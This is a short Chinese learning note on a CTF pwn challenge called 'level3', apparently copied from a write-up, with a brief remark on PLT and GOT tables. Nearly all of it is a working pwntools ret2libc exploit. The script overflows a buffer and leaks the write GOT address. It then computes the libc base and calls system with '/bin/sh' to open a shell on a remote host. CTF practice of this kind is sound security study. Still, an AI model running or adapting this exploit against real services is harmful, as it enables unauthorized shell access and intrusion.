完全看着WriteUp写的,里面说了个PLT和GOT表,这个概念之前接触过一点,但没怎么用过。模仿人家代码的时候也没怎么细想。先敲一遍将来就理解深刻了。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | from pwn import * p = remote("111.198.29.45",33161) elf = ELF("./level3") libc = ELF("./libc_32.so.6") write_plt=elf.plt['write'] write_got=elf.got['write'] main_addr=elf.sym['main'] p.recvuntil(":\n") payload=b'0'*0x88+p32(0)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4) p.sendline(payload) write_got_addr=u32(p.recv()) print(hex(write_got_addr)) libc_base=write_got_addr-libc.sym['write'] print(hex(libc_base)) system_addr=libc_base+libc.sym['system'] print(hex(system_addr)) binshaddr=libc_base+0x15902B print(hex(binshaddr)) payload2=b'0'*0x88+p32(0)+p32(system_addr)+p32(0)+p32(binshaddr) p.recvuntil(":\n") p.sendline(payload2) p.interactive() |